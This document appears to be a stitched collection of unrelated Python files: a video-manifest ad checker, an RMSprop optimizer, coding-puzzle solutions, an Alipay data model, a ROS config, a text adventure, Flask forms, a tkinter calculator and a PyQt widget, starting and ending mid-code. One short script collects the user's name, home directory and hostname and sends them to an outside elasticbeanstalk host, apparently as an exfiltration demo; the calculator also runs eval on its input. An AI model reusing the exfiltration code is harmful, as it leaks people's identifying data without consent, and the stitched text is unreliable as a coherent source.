        # pre-roll ads sit before the first entertainment segment (index 0)
        if self.ad_pre_number > 0:
            self.ad_mid_position_list.insert(0, 0)
        # post-roll ads sit after the last entertainment segment
        if self.ad_post_number > 0:
            self.ad_mid_position_list.append(self.entertainment_ts_number)
class VODManifestChecker(ManifestPaser):
    """Manifest checker for VOD assets with a detailed expectation check()."""
    def __init__(self, manifest, request_url, psn_tag=None, ad_tag=None, sequence_tag='#EXT-X-MEDIA-SEQUENCE', asset_id_tag='vod_'):
        super(VODManifestChecker, self).__init__(manifest, request_url, psn_tag, ad_tag, sequence_tag, asset_id_tag)
        self.parse()
        self.error = None
    def check(self, media_sequence_number, entertainment_ts_number, end_list_tag, drm_tag,
              ad_mid_position_list, ad_pre_number, ad_mid_number, ad_post_number,
              iframe_tag='IsIFrame=true', ad_iframe_tag='ad_iframe', audio_tag='IsAudio=true', ad_audio_tag='ad_audio'):
        """Compare the parsed manifest statistics against expectations.

        Returns None when everything matches, otherwise a human-readable
        description of the FIRST mismatch; the result is also stored in
        self.error.
        """
        message = None
        if self.has_asset_id is not True:
            message = 'Not found same asset id from manifest. url:%s' % (self.request_url)
        elif self.sequence_number != media_sequence_number:
            message = 'Manifest media sequence number is %s, not the same as expected number %s' % (self.sequence_number, media_sequence_number)
        elif self.entertainment_ts_number != entertainment_ts_number:
            message = 'Manifest entertainment ts number is %s, not the same as expected number %s' % (self.entertainment_ts_number, entertainment_ts_number)
        elif self.manifest.find(end_list_tag) < 0:
            message = 'Manifest has not end list tag %s' % (end_list_tag)
        elif self.manifest.find(drm_tag) < 0:
            message = 'Manifest has not drm tag %s' % (drm_tag)
        elif self.ad_pre_number != ad_pre_number:
            message = 'Manifest ad pre-roll number is %s, not the same as expected number %s' % (self.ad_pre_number, ad_pre_number)
        elif self.ad_mid_position_list != ad_mid_position_list:
            message = 'Manifest ad mid-roll positions is %s, not the same as expected %s' % (self.ad_mid_position_list, ad_mid_position_list)
        elif self.ad_mid_number != ad_mid_number:
            message = 'Manifest ad mid-roll position is right, but number is %s, not the same as expected number %s' % (self.ad_mid_number, ad_mid_number)
        elif self.ad_post_number != ad_post_number:
            message = 'Manifest ad post-roll number is %s, not the same as expected number %s' % (self.ad_post_number, ad_post_number)
        elif self.request_url.find(iframe_tag) > 0 and self.manifest.find(ad_iframe_tag) < 0:
            message = 'Manifest has not ad iframe tag %s, but %s is found in url %s' % (ad_iframe_tag, iframe_tag, self.request_url)
        elif self.request_url.find(audio_tag) > 0 and self.manifest.find(ad_audio_tag) < 0:
            message = 'Manifest has not ad audio tag \'%s\', but %s is found in url %s' % (ad_audio_tag, audio_tag, self.request_url)
        self.error = message
        return self.error
if __name__ == '__main__':
    # Smoke test: parse a canned VOD manifest response and check it against
    # hand-computed expectations (prints None on success, else the error).
    request_url = 'http://mm.vod.comcast.net:80/origin/playlists/vod_test_7975/king/99999999/vod_test_7975_med_3.m3u8?&IndexName=index.m3u8&BitRelLength=176&ProviderId=vod_test_7975&AssetId=abcd1234567890123456&StreamType=VOD_T6&DeviceId=X1&PartnerId=hello&dtz=2015-04-09T18:39:05-05:00&sid=VEX_27a749ad-b7af-4f10-ac9f-ebcf2f6ada27&ResourceId=4cb23d3428c74396cddf92159780bf72&BW=2050300&MinBW=2050100&IsIFrame=false&IsAudio=false&HasIFrame=true&HasAudio=true&HasSAP=false&IsSAP=false&CODEC=AAC'
    with open(os.path.dirname(os.path.realpath(__file__)) + '/../vod/fake/bitrate-fake-response.txt') as f:
        manifest = f.read()
    checker = VODManifestChecker(manifest, request_url, psn_tag=None, ad_tag='ad', asset_id_tag='vod_')
    print checker.check(18, 900, '#EXT-X-ENDLIST', 'EXT-X-FAXS-CM', [225, 450, 675], 10, 30, 10)
|
import os
# Run the project's configuration and extractor test suites through pytest.
# NOTE(review): os.system returns the command's exit status, not a path --
# the name 'home_dir' is misleading (presumably it should be 'exit_code');
# kept as-is to avoid changing the module's public names.
home_dir = os.system("pytest test/configuration/testConfiguration.py test/extractors/testCsvExtractor.py "
                     "test/extractors/testSpiderWebScrapperExtractor.py ")
|
__author__ = 'svankiE'
from clew.core.model import Event
from clew.search.index_builder import IndexBuilder
if __name__ == '__main__':
    # Rebuild the search index over every stored Event.
    print "Building object index..."
    builder = IndexBuilder()
    events = Event.query.all()
    if events:
        # for now, building clean, shiny indexes (clean=True discards the
        # existing index rather than updating it incrementally).
        builder.build_index(events, clean=True)
        print "Done."
    else:
        print "No events to be added."
from unittest import TestCase
from jira.Objects import StatusObject
class TestStatusObject(TestCase):
    """Unit tests for jira.Objects.StatusObject."""
    def test_properties(self):
        # constructor arguments must be exposed unchanged as attributes
        status = StatusObject(ident='ident1', name='display_name1')
        self.assertEqual('ident1', status.ident)
        self.assertEqual('display_name1', status.name)
|
from django.contrib import admin
from accounts.models import ApiSecretToken
# Expose the ApiSecretToken model in the Django admin with default options.
admin.site.register(ApiSecretToken)
|
import numpy as np
from .optimizer import Optimizer
class RMSprop(Optimizer):
    """RMSprop optimizer.

    Maintains an exponential moving average of squared gradients per
    parameter and divides the step by its square root, so each parameter
    gets an individually adapted learning rate.

    Parameters
    ----------
    lr : float
        Learning rate.
    momentum : float, optional
        Decay rate of the squared-gradient moving average (default 0.9).
    eps : float, optional
        Small constant added to the denominator for numerical stability.
        Default 1e-8; previously hard-coded, now parameterized
        (backward-compatible).
    """
    def __init__(self, lr, momentum=0.9, eps=1e-8):
        super().__init__()
        self.lr = lr
        self.momentum = momentum
        self.eps = eps
        # per-parameter moving average of grad**2, keyed by parameter index
        self.cache = {}
    def step(self, model):
        """Apply one in-place RMSprop update to every model parameter."""
        for i, (param, grad) in enumerate(model.parameters()):
            if i not in self.cache:
                self.cache[i] = np.zeros(grad.shape)
            # v <- momentum * v + (1 - momentum) * grad^2
            self.cache[i] = (self.momentum * self.cache[i]
                             + (1.0 - self.momentum) * grad**2)
            # in-place so the model's own arrays are updated
            param -= self.lr * grad / (np.sqrt(self.cache[i]) + self.eps)
import urllib2
import urllib
import getpass
import socket
import os
# Gather identifying information about the current user and machine.
user = getpass.getuser()
home = os.environ['HOME']
host = socket.gethostname()
info = {"user": user, "home": home, "host": host}
message = ("Hello, I am {user}, my things are in {home}." +
           " Come find me on {host}!").format(**info)
# SECURITY NOTE(review): the lines below EXFILTRATE the data above to a
# remote third-party host over unencrypted HTTP via a GET query string.
# Presumably this is a security demo/exercise; do not run on real machines.
args = {'msg': message }
data = urllib.urlencode(args)
req = urllib2.urlopen('http://exfiltration-env.ug5fvfwjza.us-west-2.elasticbeanstalk.com/log?' + data)
response = req.read()
|
"""
Input Format
The first line of input contains the original string. The next line contains the substring.
Testing things
Output Format
Output the integer number indicating the total number of occurrences of the substring in the original string.
Sample Input
ABCDCDC
CDC
Sample Output
2
"""
str,sub,count=raw_input(),raw_input(),0
for i in range(len(str)):
if str[i:i+len(sub)] == sub:
count+=1
print count
|
def min_path_sum(matrix):
    """Return the minimal sum along a top-left to bottom-right path.

    Only right and down moves are allowed. Uses O(rows*cols) dynamic
    programming where dp[r][c] is the cheapest cost of reaching cell (r, c).

    Robustness fix: an empty matrix (or a matrix of empty rows) now
    returns 0 instead of raising IndexError.
    """
    if not matrix or not matrix[0]:
        return 0
    row_length = len(matrix)
    col_length = len(matrix[0])
    dp = [[0] * col_length for _ in range(row_length)]
    # Seed the first cell, then the first column and row -- there is only
    # one way to reach each of those cells.
    dp[0][0] = matrix[0][0]
    for row in range(1, row_length):
        dp[row][0] = matrix[row][0] + dp[row - 1][0]
    for col in range(1, col_length):
        dp[0][col] = matrix[0][col] + dp[0][col - 1]
    # Every inner cell is reached from above or from the left; take the cheaper.
    for row in range(1, row_length):
        for col in range(1, col_length):
            dp[row][col] = min(dp[row - 1][col], dp[row][col - 1]) + matrix[row][col]
    return dp[-1][-1]
print(min_path_sum([[1, 3, 1], [1, 5, 1], [4, 2, 1]]))
print(min_path_sum([[1, 2, 3], [4, 5, 6]]))
|
"""
Given a string, you need to reverse the order of characters in each word within a sentence while still preserving whitespace and initial word order.
Example 1:
Input: "Let's take LeetCode contest"
Output: "s'teL ekat edoCteeL tsetnoc"
Note: In the string, each word is separated by single space and there will not be any extra space in the string.
"""
def reverseString(s):
    """Return s reversed.

    Builds the back and front halves simultaneously from both ends.

    Bug fix: for odd-length strings the middle character is s[n // 2];
    the original used s[n // 2 + 1], which dropped the middle character
    and duplicated its right neighbour (e.g. "abc" -> "cca" not "cba").
    """
    fstr = ""
    bstr = ""
    mstr = ""
    n = len(s)
    for i in range(0, n // 2):
        fstr = s[i] + fstr
        bstr = bstr + s[n - 1 - i]
    if n % 2 != 0:
        mstr = s[n // 2]  # middle character of an odd-length string
    return bstr + mstr + fstr
def reverseWords(s):
    """Reverse the characters of each space-separated word in s.

    Word order and the single spaces between words are preserved.

    :type s: str
    :rtype: str

    Fixes: the original shadowed the built-in `max` with a local word
    counter and assembled the result with manual concatenation; a
    str.join over the reversed words is equivalent and idiomatic.
    """
    # split(' ') (NOT split()) so words map one-to-one onto output words,
    # matching the problem's single-space guarantee.
    return " ".join(reverseString(word) for word in s.split(' '))
# Demo: print the sample sentence followed by its per-word reversal.
data = "Let's take LeetCode contest"
print (data)
print (reverseWords(data))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class DataItem(object):
    """Generated Alipay API model for one search-result data item.

    Plain value holder: every field is exposed through a trivial
    property/setter pair, with list-typed fields (ext_res_field, images)
    copied element-by-element. Conversion to/from the wire dict format is
    via to_alipay_dict / from_alipay_dict.
    """
    def __init__(self):
        self._biz_trace_id = None
        self._ext_res_field = None
        self._highlight_summary = None
        self._highlight_title = None
        self._id = None
        self._images = None
        self._item_total_count = None
        self._score = None
        self._sequence = None
        self._summary = None
        self._title = None
        self._trace_id = None
    @property
    def biz_trace_id(self):
        return self._biz_trace_id
    @biz_trace_id.setter
    def biz_trace_id(self, value):
        self._biz_trace_id = value
    @property
    def ext_res_field(self):
        return self._ext_res_field
    @ext_res_field.setter
    def ext_res_field(self, value):
        # NOTE(review): non-list values are silently ignored by this setter
        # (generated-code convention).
        if isinstance(value, list):
            self._ext_res_field = list()
            for i in value:
                self._ext_res_field.append(i)
    @property
    def highlight_summary(self):
        return self._highlight_summary
    @highlight_summary.setter
    def highlight_summary(self, value):
        self._highlight_summary = value
    @property
    def highlight_title(self):
        return self._highlight_title
    @highlight_title.setter
    def highlight_title(self, value):
        self._highlight_title = value
    @property
    def id(self):
        return self._id
    @id.setter
    def id(self, value):
        self._id = value
    @property
    def images(self):
        return self._images
    @images.setter
    def images(self, value):
        # NOTE(review): non-list values are silently ignored by this setter.
        if isinstance(value, list):
            self._images = list()
            for i in value:
                self._images.append(i)
    @property
    def item_total_count(self):
        return self._item_total_count
    @item_total_count.setter
    def item_total_count(self, value):
        self._item_total_count = value
    @property
    def score(self):
        return self._score
    @score.setter
    def score(self, value):
        self._score = value
    @property
    def sequence(self):
        return self._sequence
    @sequence.setter
    def sequence(self, value):
        self._sequence = value
    @property
    def summary(self):
        return self._summary
    @summary.setter
    def summary(self, value):
        self._summary = value
    @property
    def title(self):
        return self._title
    @title.setter
    def title(self, value):
        self._title = value
    @property
    def trace_id(self):
        return self._trace_id
    @trace_id.setter
    def trace_id(self, value):
        self._trace_id = value
    def to_alipay_dict(self):
        """Serialize to a plain dict in Alipay wire format.

        NOTE(review): fields are included only when truthy ('if self.x:'),
        so falsy values such as 0, '' or [] are silently dropped --
        generated-code convention, kept as-is.
        """
        params = dict()
        if self.biz_trace_id:
            if hasattr(self.biz_trace_id, 'to_alipay_dict'):
                params['biz_trace_id'] = self.biz_trace_id.to_alipay_dict()
            else:
                params['biz_trace_id'] = self.biz_trace_id
        if self.ext_res_field:
            if isinstance(self.ext_res_field, list):
                for i in range(0, len(self.ext_res_field)):
                    element = self.ext_res_field[i]
                    if hasattr(element, 'to_alipay_dict'):
                        self.ext_res_field[i] = element.to_alipay_dict()
            if hasattr(self.ext_res_field, 'to_alipay_dict'):
                params['ext_res_field'] = self.ext_res_field.to_alipay_dict()
            else:
                params['ext_res_field'] = self.ext_res_field
        if self.highlight_summary:
            if hasattr(self.highlight_summary, 'to_alipay_dict'):
                params['highlight_summary'] = self.highlight_summary.to_alipay_dict()
            else:
                params['highlight_summary'] = self.highlight_summary
        if self.highlight_title:
            if hasattr(self.highlight_title, 'to_alipay_dict'):
                params['highlight_title'] = self.highlight_title.to_alipay_dict()
            else:
                params['highlight_title'] = self.highlight_title
        if self.id:
            if hasattr(self.id, 'to_alipay_dict'):
                params['id'] = self.id.to_alipay_dict()
            else:
                params['id'] = self.id
        if self.images:
            if isinstance(self.images, list):
                for i in range(0, len(self.images)):
                    element = self.images[i]
                    if hasattr(element, 'to_alipay_dict'):
                        self.images[i] = element.to_alipay_dict()
            if hasattr(self.images, 'to_alipay_dict'):
                params['images'] = self.images.to_alipay_dict()
            else:
                params['images'] = self.images
        if self.item_total_count:
            if hasattr(self.item_total_count, 'to_alipay_dict'):
                params['item_total_count'] = self.item_total_count.to_alipay_dict()
            else:
                params['item_total_count'] = self.item_total_count
        if self.score:
            if hasattr(self.score, 'to_alipay_dict'):
                params['score'] = self.score.to_alipay_dict()
            else:
                params['score'] = self.score
        if self.sequence:
            if hasattr(self.sequence, 'to_alipay_dict'):
                params['sequence'] = self.sequence.to_alipay_dict()
            else:
                params['sequence'] = self.sequence
        if self.summary:
            if hasattr(self.summary, 'to_alipay_dict'):
                params['summary'] = self.summary.to_alipay_dict()
            else:
                params['summary'] = self.summary
        if self.title:
            if hasattr(self.title, 'to_alipay_dict'):
                params['title'] = self.title.to_alipay_dict()
            else:
                params['title'] = self.title
        if self.trace_id:
            if hasattr(self.trace_id, 'to_alipay_dict'):
                params['trace_id'] = self.trace_id.to_alipay_dict()
            else:
                params['trace_id'] = self.trace_id
        return params
    @staticmethod
    def from_alipay_dict(d):
        """Deserialize a wire-format dict into a DataItem (None for empty input)."""
        if not d:
            return None
        o = DataItem()
        if 'biz_trace_id' in d:
            o.biz_trace_id = d['biz_trace_id']
        if 'ext_res_field' in d:
            o.ext_res_field = d['ext_res_field']
        if 'highlight_summary' in d:
            o.highlight_summary = d['highlight_summary']
        if 'highlight_title' in d:
            o.highlight_title = d['highlight_title']
        if 'id' in d:
            o.id = d['id']
        if 'images' in d:
            o.images = d['images']
        if 'item_total_count' in d:
            o.item_total_count = d['item_total_count']
        if 'score' in d:
            o.score = d['score']
        if 'sequence' in d:
            o.sequence = d['sequence']
        if 'summary' in d:
            o.summary = d['summary']
        if 'title' in d:
            o.title = d['title']
        if 'trace_id' in d:
            o.trace_id = d['trace_id']
        return o
|
#!/usr/bin/env python
# dynamic_reconfigure generator for the Thymio controller node: declares
# the run-time tunable parameters (mode, speed limits, PID gains, test pose).
PACKAGE = "ros_basics_exercise"
from dynamic_reconfigure.parameter_generator_catkin import *
gen = ParameterGenerator()
# Operating mode: obstacle avoidance (0) or calibration test run (1).
mode_enum = gen.enum([gen.const("Obstacle_Avoidance", int_t, 0, "run with obstacle avoidance"),
                      gen.const("Test", int_t, 1, "run for test")], "An enum to set mode")
gen.add("mode", int_t, 0, "A size parameter which is edited via an enum", 0, 0, 1, edit_method=mode_enum)
# Velocity limits: gen.add(name, type, level, description, default, min, max).
gen.add("W_MAX", double_t, 0, "Max value of rotation speed", 3.14, 0, 8.)
gen.add("V_MAX", double_t, 0, "Max value of translation speed", 0.05, 0, 0.4)
# PID gains for the rotation (W_*) and translation (V_*) controllers.
gen.add("W_KP", double_t, 0, "KP of rotation PID", 3.0, 0, 5)
gen.add("W_KI", double_t, 0, "KI of rotation PID", 0.0, 0, 1)
gen.add("W_KD", double_t, 0, "KD of rotation PID", 0.0, 0, 1)
gen.add("V_KP", double_t, 0, "KP of translation PID", 2.0, 0, 5)
gen.add("V_KI", double_t, 0, "KI of translation PID", 0.0, 0, 1)
gen.add("V_KD", double_t, 0, "KD of translation PID", 0.0, 0, 1)
# Target pose used when running in Test mode.
gen.add("test_x", double_t, 0, "test target in x", 0.0, -0.4, 0.4)
gen.add("test_y", double_t, 0, "test target in y", 0.0, -0.2, 0.2)
gen.add("test_yaw",double_t, 0, "test target in yaw", 0.0, -3.15, 3.15)
gen.add("start_test", bool_t, 0, "start flag for calibration test", False)
# package, node, name prefix: `<name>Config.h` or `<name>Config.py`
exit(gen.generate(PACKAGE, "ros_basics_exercise", "ThymioController"))
|
# -*- coding: utf-8 -*-
from datetime import time
from datetime import timedelta
from datetime import datetime
#Strings player inputs
WAIT = "Wait"
CLIMB = "Climb"
CHECK = "Check"
ROLL = "Roll"
#Strings world situations
ALIVE = "You are alive"
#Strings narrator outputs
#Initialization of variables
player_available_verbs = [WAIT, CLIMB, CHECK] #dynamic verbs available for player.
player_situation = [ALIVE] #dynamic state of player/world
current_time = datetime(2020, 4, 4, 12, 00) #should move remaining (below) variables into datastructure
percent_up_mountain = 0 #out of 100
player_energy = 100
player_health = 100
turn_counter = 0
# World actions
def adjust_player_energy(theEnergyAmount):
    """Apply an energy delta, clamping to [0, 100].

    An energy deficit below zero is converted into an equal health loss.
    """
    global player_energy
    player_energy += theEnergyAmount
    if player_energy > 100:
        player_energy = 100
    if player_energy <= 0:
        # Roll the shortfall over into damage, then floor energy at 0.
        deficit = -player_energy
        adjust_player_health(-deficit)
        player_energy = 0
        print("You feel exhausted.")
def adjust_player_health(theHealthAmount):
    """Apply a health delta, capped at 100; announce any damage taken."""
    global player_health
    player_health += theHealthAmount
    if theHealthAmount < 0:
        print("It hurts")
    # Health never exceeds the maximum of 100.
    player_health = min(player_health, 100)
def advance_time_by_minutes(theTimeAmount):
    """Push the world clock forward by the given number of minutes."""
    global current_time
    current_time += timedelta(minutes=theTimeAmount)
def advance_world():
    """Hook for autonomous world changes each turn; currently a no-op."""
    return None
# Narrator actions
def check_for_win(thePercent):
    """Announce the win condition once the climb reaches 100%.

    Fix: the original also reassigned its local copy of thePercent to 100,
    which had no effect outside the function; that dead assignment is removed.
    """
    if thePercent >= 100:
        print("You've made it up the mountain. Now you are stuck.")
def check_for_still_alive(theCurrentHealth):
    """Return True while the player has positive health.

    Idiom fix: returns the comparison directly instead of an
    if/else that returns True/False.
    """
    return theCurrentHealth > 0
def process_player_input(theInput):
    """Echo the attempted action; return True only for a recognized verb.

    Idiom fix: replaces `(x in y) == False` with `x not in y`.
    """
    print("\nYou attempt to " + theInput +":")
    if theInput not in player_available_verbs:
        print("but you spelled something wrong.")
        return False
    return True #Input was good
def describe_situation(theSituationList):
    """Narrator: print the situation entries as 'a, b, c.' on one line."""
    line = ", ".join(str(item) for item in theSituationList)
    print(line, end=".\n")
def list_verbs(theVerbs):
    """Narrator: print each available verb on its own line."""
    print("\n".join(str(verb) for verb in theVerbs))
# Player verbs
def player_wait():
    """Wait verb: two hours pass; energy and health recover."""
    print("Some time passes.")
    advance_time_by_minutes(120)
    adjust_player_energy(30)
    adjust_player_health(7)
def player_climb_mountain():
    """Climb verb: two hours pass, energy drains, progress rises by 10%."""
    global percent_up_mountain
    print("You make some progress climbing.")
    advance_time_by_minutes(120)
    adjust_player_energy(-30)
    percent_up_mountain += 10
def player_check(): #This would be an iterator over player stats structure
    """Check verb: report the clock, energy, health and climb progress."""
    print("The time is: {}".format(current_time.time()))
    print("Your energy is: {}".format(player_energy))
    print("Your health is: {}".format(player_health))
    print("You are {}% up the mountain".format(percent_up_mountain))
# Verb function list
# Dispatch table: maps a recognized verb string to its handler function.
verbs = {
    CLIMB : player_climb_mountain,
    WAIT : player_wait,
    CHECK : player_check
}
# System actions
def process_action(theInput):
    """Look up the handler for a validated verb string and invoke it."""
    do_verb = verbs[theInput] #potential arbitrary method exec?
    do_verb()
    return
# Main game loop
# Method calls are prepended with manager
running = True
while running:
    describe_situation(player_situation) # narrator
    print("You can:\n")
    list_verbs(player_available_verbs) # narrator
    player_input = input ("\nWhat do you do? \n>")
    # Normalize case so e.g. "wait" matches the verb constant "Wait".
    player_input = player_input.capitalize()
    do_action = process_player_input(player_input)
    if do_action:
        process_action(player_input) # system
    advance_world() # world
    check_for_win(percent_up_mountain) # narrator
    running = check_for_still_alive(player_health) # narrator
    turn_counter = turn_counter + 1
    print("----------="+ str(turn_counter) +"=----------")
# The loop exits only when health reaches zero.
print("----------=You=----------")
print("----------=Are=----------")
print(" ---------=Dead=---------")
'''
소수 찾기 코드
가장 기본적인 내용만을 사용한 파이썬 코드
(1과 자기 자신의 수 외의 수로 나눠지는 경우 소수가 아님을 활용하여
입력된 특정한 숫자 하나가 소수인지 아닌지 판별하는 단순한 코드)
'''
def FindPrime(x):
    """Return True if x is a prime number, else False.

    Fixes over the original: numbers below 2 (0, 1, negatives) were
    reported as prime; trial division now stops at sqrt(x) instead of
    scanning every value up to x.
    """
    if x < 2:
        return False
    for i in range(2, int(x ** 0.5) + 1):
        if x % i == 0:
            return False
    return True
print(FindPrime(67))
|
import eng
class Bar:
    """The bar room: descriptions, doors, items and visit bookkeeping."""
    name = 'Bar'
    visited = False
    visible = False
    aliases = []
    descriptions = {'shortDesc': "You're in the bar again. People are still enjoying conversation and drinks. There are exits to the south and west, and a door to the east leading outside. ",
                    'longDesc': "You've found a bar. " \
                    "The bar has the look of an old London upscale pub with a long marble counter. " \
                    "There are a few people in the room enjoying themselves and a bartender behind the counter. " \
                    "At the bar you see a Catholic Priest. Once you're done here, you can take west or south exits, " \
                    "or a door to the east that leads outside. "}
    doors = {'west': 'ballroomBarDoor', 'east': 'barGardensDoor', 'south': 'barGalleryDoor'}
    items = ['Catholic Priest', 'bartender', 'counter', 'bone key']
    properties = {'initialized': False}

    def _printShortDesc(self):
        # Text shown on repeat visits.
        return self.descriptions['shortDesc']

    def _printLongDesc(self):
        # First call flips the initialized flag; the text is the same either way.
        if not self.properties['initialized']:
            self.properties['initialized'] = True
        return self.descriptions['longDesc']

    def enterRoom(self):
        if self.visited:
            return self._printShortDesc()
        self.visited = True
        # Bar description talks about outside, so the Gardens become visible.
        gardens = eng.getRoomByName('Gardens')
        gardens.visible = True
        return self._printLongDesc()

    # Per game requirements, look should reprint long description
    def look(self):
        return self._printLongDesc()
# Instantiate the room and register it with the game engine.
bar = Bar()
eng.setupRoom(bar)
|
# NOTE: Python 2 script (raw_input / print statement). Comparing ints
# against the initial None sentinel relies on Python 2 ordering rules.
# Prints the second-largest *distinct* value of the input list.
if __name__ == '__main__':
    n = int(raw_input())
    arr = map(int, raw_input().split())
    # max: largest seen so far; max2: largest value strictly below max.
    max = max2 = None
    for x in arr:
        if x == max:
            max2 = max2  # duplicate of the current maximum: no change
        elif x > max:
            max, max2 = x, max
        elif x > max2:
            max, max2 = max, x
    print max2
from os import path
from flask.ext.uploads import (UploadSet, configure_uploads, AllExcept, SCRIPTS,
EXECUTABLES)
from flask.ext.wtf import (Form, TextField, TextAreaField, BooleanField,
SelectField, RadioField, PasswordField, FileField,
QuerySelectField,DateField,
Required, Length, Optional, Email, NumberRange,
EqualTo, SubmitField, file_allowed)
from . import models
from . import app
# Uploads land under <instance_path>/upload; script and executable
# file types are rejected for safety.
upload_dir = lambda app: path.join(app.instance_path,'upload')
allowed = UploadSet('allowed', AllExcept(SCRIPTS + EXECUTABLES),
                    default_dest = upload_dir)
configure_uploads(app, (allowed))
def category_query():
    """Query factory for QuerySelectField: all Category rows."""
    return models.Category.query
class Create(Form):
    """Base ticket-creation form: subject, description, category, account, cost, attachment."""
    title=TextField('Subject', validators=[Length(3),Required()])
    description=TextAreaField('Description', validators=[Length(3),Optional()])
    category=QuerySelectField('Category', get_label='name',
                              query_factory=category_query, validators=[Optional()])
    account=TextField('Account', validators=[Length(3),Optional()])
    cost=TextField('Cost')
    file_upload=FileField('Attachment', validators=[file_allowed(allowed,
                          "Unsupported File Type")])
class Ticket(Create):
    """Full ticket form: Create's fields plus due date, status, approval and priority."""
    due=DateField('Due Date', validators=[Optional()])
    status=TextField('Status')
    approved=BooleanField('Approved')
    approved_by=TextField('Approved By')
    comment=TextAreaField('Comment', validators=[Length(3),Optional()])
    priority=SelectField('Priority', choices=[(0,'None'), (1,'Lowest'),
                         (2,'Low'), (3,'Normal'), (4, 'High'), (5,'URGENT')], coerce=int,
                         validators=[NumberRange(0,5)])
class Note(Form):
    """Single-field form for adding a note to a ticket."""
    text=TextAreaField('New Note')
class Message(Form):
    """Single-field form for posting a message."""
    text=TextAreaField('New Message')
class Category(Form):
    """Form for creating a ticket category, optionally featured on the homepage."""
    name=TextField('New Category')
    description=TextAreaField('Description')
    frontpage=BooleanField('On Homepage')
    submit = SubmitField('Add Category')
class Login(Form):
    """OpenID login form."""
    openid=TextField('OpenID')
class Profile(Form):
    """User profile form; all fields are required (email must be valid)."""
    name=TextField('Full Name', validators=[Required()])
    email=TextField('Email', validators=[Required(),Email()])
    student_id=TextField('Student ID', validators=[Required()])
class Upload(Form):
    """Bare attachment-upload form, restricted to the allowed upload set."""
    file_upload=FileField('', validators=[file_allowed(allowed,
                          "Unsupported File Type")])
|
from tkinter import *
from tkinter import messagebox
def CleanJavab(display):
    """Reset the calculator display label to an empty string."""
    display.config(text="")
    display.update()
def Add(display, token):
    """Append a token (digit or operator) to the display label's text."""
    display.config(text=display['text'] + token)
    display.update()
def Remove_a_Number(label):
    """Backspace: drop the last character of the display, if any.

    Idiom fix: the original copied the string character by character,
    skipping the last one; slicing (`[:-1]`) does the same in one step.
    """
    current = label['text']
    if len(current) > 0:
        label.config(text=current[:-1])
    label.update()
def hesab(label):
    """Evaluate the expression on the display and show the result.

    The display's ×/÷ symbols are mapped to Python's * and / first.
    SECURITY NOTE: eval() executes arbitrary Python; tolerable only
    because the text comes from the calculator's own buttons.
    """
    g = label['text']
    g = g.replace("×","*")
    g = g.replace("÷","/")
    try:
        jvab = eval(g)
        label.config(text=str(jvab))
    except:
        # Invalid expression: clear the display and warn (Persian dialog:
        # title "Error", message "The expression is invalid.").
        label.config(text="")
        messagebox.showinfo("خطا",".عبارت نامعتبر است")
    label.update()
# --- Calculator UI construction (Persian window title: "personal calculator") ---
root = Tk()
root.title("ماشين حساب شخصي");
# The result/display label spans the whole top row.
javab = Label(root,width=50,text="")
# Operator buttons; × and ÷ are translated to * and / by hesab().
btnJam = Button(root,text="+",padx=40,pady=20,command=lambda:Add(javab,"+"))
btnTafrig = Button(root,text="-",padx=40,pady=20,command=lambda:Add(javab,"-"))
btnZarb = Button(root,text="x",padx=40,pady=20,command=lambda:Add(javab,"×"))
btnTagsim = Button(root,text="÷",padx=40,pady=20,command=lambda:Add(javab,"÷"))
# Digit buttons 0-9.
btn1 = Button(root,text="1",padx=40,pady=20,command=lambda:Add(javab,"1"))
btn2 = Button(root,text="2",padx=40,pady=20,command=lambda:Add(javab,"2"))
btn3 = Button(root,text="3",padx=40,pady=20,command=lambda:Add(javab,"3"))
btn4 = Button(root,text="4",padx=40,pady=20,command=lambda:Add(javab,"4"))
btn5 = Button(root,text="5",padx=40,pady=20,command=lambda:Add(javab,"5"))
btn6 = Button(root,text="6",padx=40,pady=20,command=lambda:Add(javab,"6"))
btn7 = Button(root,text="7",padx=40,pady=20,command=lambda:Add(javab,"7"))
btn8 = Button(root,text="8",padx=40,pady=20,command=lambda:Add(javab,"8"))
btn9 = Button(root,text="9",padx=40,pady=20,command=lambda:Add(javab,"9"))
btn0 = Button(root,text="0",padx=40,pady=20,command=lambda:Add(javab,"0"))
# Equals (evaluate), clear-all and backspace buttons.
btnEqual = Button(root,text="=",padx=40,pady=116,command=lambda: hesab(javab))
btnClean = Button(root,text="CL",padx=36,pady=20,command=lambda: CleanJavab(javab))
# NOTE(review): fractional padx (39.4) — confirm tkinter accepts it everywhere.
btnRemove = Button(root,text="R",padx=39.4,pady=20,command=lambda: Remove_a_Number(javab))
# Grid layout: operators on row 1, digits on rows 2-5, '=' spanning rows 2-5.
btnJam.grid(row=1,column=1)
btnTafrig.grid(row=1,column=2)
btnZarb.grid(row=1,column=3)
btnTagsim.grid(row=1,column=4)
btn1.grid(row=2,column=1)
btn2.grid(row=2,column=2)
btn3.grid(row=2,column=3)
btn4.grid(row=3,column=1)
btn5.grid(row=3,column=2)
btn6.grid(row=3,column=3)
btn7.grid(row=4,column=1)
btn8.grid(row=4,column=2)
btn9.grid(row=4,column=3)
btn0.grid(row=5,column=2)
btnEqual.grid(row=2,rowspan=4,column=4)
javab.grid(row=0,column=0,columnspan=5)
btnClean.grid(row=5,column=1)
btnRemove.grid(row=5,column=3)
mainloop()
|
from view.resources.top_five_view import TopFive
from PyQt5.QtGui import QPixmap
from PyQt5.QtWidgets import QDialog, QHBoxLayout, QLabel, QPushButton, QVBoxLayout, QWidget
class EmployeeGrid(QWidget):
    """QWidget to present the employees tab
    """
    def __init__(self, db_controller):
        super().__init__()
        # Data-access object used for employee and sales lookups.
        self.db_controller = db_controller
    def employee_grid(self):
        """Returns the QWidget to present the employee tab as a grid layout
        """
        grid = QVBoxLayout()
        row_one = QHBoxLayout()
        row_two = QHBoxLayout()
        QLabels = self.__fill_grid()
        pixmap = QPixmap('view/img/avatar.png')
        pixmap_girl = QPixmap('view/img/avatar_girl.png')
        # Set the employee text to the right of an image
        label = QLabel()
        label.setPixmap(pixmap)
        label.setMaximumSize(pixmap.width(), pixmap.height())
        row_one.addWidget(label)
        row_one.addWidget(QLabels[0])
        label = QLabel()
        label.setPixmap(pixmap_girl)
        label.setMaximumSize(pixmap_girl.width(), pixmap_girl.height())
        row_one.addWidget(label)
        row_one.addWidget(QLabels[1])
        # Second row: two more avatar/text pairs.
        label = QLabel()
        label.setPixmap(pixmap_girl)
        label.setMaximumSize(pixmap_girl.width(), pixmap_girl.height())
        row_two.addWidget(label)
        row_two.addWidget(QLabels[2])
        label = QLabel()
